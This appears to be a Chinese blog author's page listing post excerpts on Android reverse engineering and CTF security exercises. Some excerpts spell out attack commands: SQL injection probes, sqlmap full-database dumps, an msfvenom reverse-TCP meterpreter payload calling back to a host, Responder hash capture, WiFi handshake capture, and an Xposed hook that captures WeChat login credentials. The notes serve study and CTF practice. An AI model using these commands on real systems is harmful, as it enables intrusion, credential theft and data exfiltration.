自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(28)
  • 资源 (1)
  • 收藏
  • 关注

原创 微信hook——登录界面的账号密码

Hook方法一: 手机号码登陆,Method跟踪点击登陆事件: 点击事件内容 分析bj方法,有两个string参数,依然最后调用了com.tencent.mm.modelsimple.q,hook这个bj方法,查看两个参数是什么。 Hook方法: 得到的结果:Hook成功!  Hook方法二 微信号、QQ登陆,me...

2019-02-12 00:43:46 2308

原创 xposed实践(二)、修改手机IMEI值

1.bridgeApi导入lib文件夹中,module中添加编译。 2.Activity中实现getDevice方法 3.新建类实现IXposedHookLoadPack接口静态方法和静态类的使用 4.在assets文件夹中新建xposed_init文件,添加3中的类名 5.修改manifest,增加标签<meta-data       ...

2018-12-28 17:58:38 2453

原创 xposed实践(一)、插件完成hook

一共两个应用;一个目标应用,一个插件应用一、目标app实现: 二、Hook插件的实现1.新建一个工程,导入XposedBridgeApi-54库,添加manifest说明项。 2.新建类,实现IXposedHookLoadPackage接口。 3.新建xposed_init文件,添加新建类的名称。 4.运行,添加插件就好了 效果:被hoo...

2018-12-28 17:54:42 929

原创 JDOM解析xml

<PeopleList> <People id="1"> <Name en='zhangsan'>张三</Name> <Age>20</Age> </People> <People id="2"&

2018-11-23 11:46:51 120

原创 加固前奏2-替换application

运行加载过程ActivityThread.JAVAApplication app = data.info.makeApplication(data.restrictedBackupMode, null);                            ->进入LoadedApk.java                                    String ap...

2018-11-21 16:57:44 404

原创 加固前奏1-替换classloader

使用反射实现替换classLoader1.获取"android.app.ActivityThread"中的"mPackages" ;定义为arraymap<String,weakReference<LoadedApk>> mPackages c = Class.forName("android.app.ActivityThread"); ...

2018-11-21 14:01:50 382

原创 smali语法的复习整理

1.基本数据类型smali类型  java类型         V  void (只能用于返回值类型)         Z  boolean         B  byte         S  short         C char         I  int         J  long         F  float         D  double 2...

2018-11-20 00:14:33 185

原创 arm反编译-四则运算

int main() {    int a, b, c, d;    unsigned int ua;    a = 100;    b = a;    //字符串    char say[] = "hello";    scanf("%d,%d", &a, &b);    printf("a=%d,b=%d", a, b);    b = 5;    //加...

2018-11-02 22:58:28 858

原创 将so文件给外部工程引用

调用第三方so文件,无需包名与so文件中的呼应java方法相同,就是创建一个jar,使它的包名和so中的包名相同。 1.新建一个测试工程,创建好c++代码,cmake照旧写入。图1.1、测试工程目录 2.建立library新建一个Android library的module,建立两个测试类,在其中一个测试类中导入lib,新建native方法,回到native-lib.c...

2018-10-25 19:46:13 907

原创 Android导出so文件

1.创建工程生成c++,包名为com.cc.test_socreator,内容: 此时可以在MainActivity中使用代码调用stringFromJNI:可以在jniTest中调用getString:  2.生成so文件Build-make project在没有报错,工程建立以后会在build-intermediates-cmake-debug下生成so...

2018-10-25 19:42:51 696

原创 so文件简单的导出使用

1.创建工程生成c++,包名为com.cc.test_socreator,内容:此时可以在MainActivity中使用代码调用stringFromJNI:可以在jniTest中调用getString: 2.生成so文件Build-make project在没有报错,工程建立以后会在build-intermediates-cmake-debug下生成so。签名以...

2018-10-24 18:46:07 1274

原创 约束的sql攻击

PHP mysql_real_escape_string() 函数mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。下列字符受影响:\x00\n\r\'"\x1a如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。在sql执行字符串处理的时候,字符串末尾的空格符都会被删除,以下两个字符串结果相等SE...

2018-08-21 20:15:06 815

原创 忘记密码了 - bugku

http://ctf5.shiyanbar.com/10/upload/step1.php查看源码以后发现有个管理员地址<meta name="admin" content="admin@simplexue.com" />邮箱填写该地址,弹出邮件发到管理员邮箱了,你看不到的随便更换一个邮箱地址,弹出 ./step2.php?email=youmail@mail.com&am...

2018-08-21 20:14:06 522

原创 sql注入点的判断

判断sql注入点1.单引号判断    http://www.xxx.com/xxx.asp?id=10' 如果出现错误提示,则该网站可能就存在注入漏洞。2.and判断    http://www.xxx.com/xxx.asp?id=10'and 1=1这个条件永远都是真的,所以当然返回是正常页    http://www.xxx.com/xxx.asp?id=10'and 1=2如...

2018-08-21 20:12:34 14565 2

原创 sqlmap的post使用方法

http://120.24.86.145:8002/chengjidan/index.php注入通过post提交id查询。1.使用burpSuite拦截post包,复制下数据包为a.txt2.sqlmap -r a.txt -p 参数 --batch 默认选择 --dump-all 直接爆破所有例如sqlmap -r a.txt -p username --batch --dum...

2018-08-21 20:11:54 2758

原创 never give up - bugku

http://120.24.86.145:8006/test/hello.php?id=1看源码知道存在一个1p.html的网页。查看1p.html源码var Words ="%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--JTIyJTNCaWYlMj...

2018-08-21 20:11:23 453

原创 php中绕过md5检验

<?phpif(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1)...

2018-08-21 20:10:03 2268

原创 点击一百万次-GET转POST发送

点击一百万次,bugku中的一道题。通过js判断点击数目,然后使用post将clicks次数发送给服务器。          if(clicks >= 1000000){              var form = $('<form action="" method="post">' +                        '<input type...

2018-08-21 20:08:46 1954

原创 mobile1(gctf)

bugku中的安卓题。重点部分,smalismali中的循环 隔位去字符 const/4 v4, 0x0 .local v4, "i":I :goto_1 invoke-virtual {v3}, Ljava/lang/String;->length()I move-result v8 if-ge v4, v8, :cond_2...

2018-08-21 20:06:49 1840

原创 forms-隐藏处理

http://ctf5.shiyanbar.com/10/main.php获取pin码。查看网页源码<form action="" method="post">    PIN:<br>    <input type="password" name="PIN" value="">    <input

2018-08-09 21:44:47 865

原创 简单的sql注入之3-盲注

http://ctf5.shiyanbar.com/web/index_3.php盲注猜数据库名        方法一:(可以通过burpsuite拦截数据包,更改ascii值重发获取)        1' and length(database())=4 #数据库名长度是4        1' and ascii(substr(database(),1,1))=119#    w...

2018-08-09 21:42:26 1512 1

转载 md5绕过_ffifdyop

地址:http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php源码: <!-- $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $...

2018-08-07 23:01:06 2631

原创 sqlmap的使用

实验吧简单注入,地址http://ctf5.shiyanbar.com/8/index.php?id=1当输入id=1 and 1=1 和 id=1 and 1=2分别出现不同的搜索结果,说明存在注入点,直接上sqlmap。 爆破整个数据库:sqlmap -u http://ctf5.shiyanbar.com/8/index.php?id=1 --batch --dump...

2018-08-07 22:31:42 110

原创 msfvenom 简单利用记录

msfvenom常用参数大概就是-p (payload) ,-e(encoder),-i(encoder次数),-o(输出路径),-f(输出文件类型)。 简单生成一个反弹tcp的exe文件,使用编码方式是xor:msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.120 LPORT=4444 -e xor -...

2018-08-05 16:19:20 444

翻译 LLMNR/NBT-NS欺骗攻击 responder

启动responder responder -wrf --lm -v -I eth0在被监控主机上操作如\\1.1.1.1\share操作,会发出一个广播,被responder监听监听到数据文件保存位置/usr/share/responder/logs下,使用john破解密码待完善......

2018-07-10 23:47:49 550

翻译 airmon-ng爆破wifi

1.airmon-ng start wlan3,启动网卡.2.开启监控,airodump-ng wlan0mon,可以查看到可以wifi的基本信息3.针对网络进行监听。-c是管道,-w phi 我也不知道是什么,好像是指定的包类型。4.进入监听以后,可以看到有两台机器连接到wifi。我们需要抓到handshake的包,也就是握手包的信息。5.伪造发送下线命令,客户端就会重连wifi,此时我们可以抓...

2018-07-10 23:16:36 520

原创 linux用户管理

1.添加用户百度说可以用useradd和adduser,其实不行;useradd不能再/home下创建文件夹,应该用adduser。adduser  test

2018-07-08 14:23:06 108

原创 ubuntu自动重连l2tp并转发

#自动重连shell#!/bin/shppp0_flag=`ifconfig | grep ppp0`echo $ppp0_flagif [ -z "$ppp0_flag" ];then echo "connet to vpn ..." # connet vpn # USER_PASSWORD 为用户密码,这样的方式就不用输入密码了。 # echo PASS...

2018-07-01 19:30:55 1640

ndk-mips64el

mips64el-linux-android缺失时候,将文件解压至ndk-bundle\toolchains路径下。

2018-11-19

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除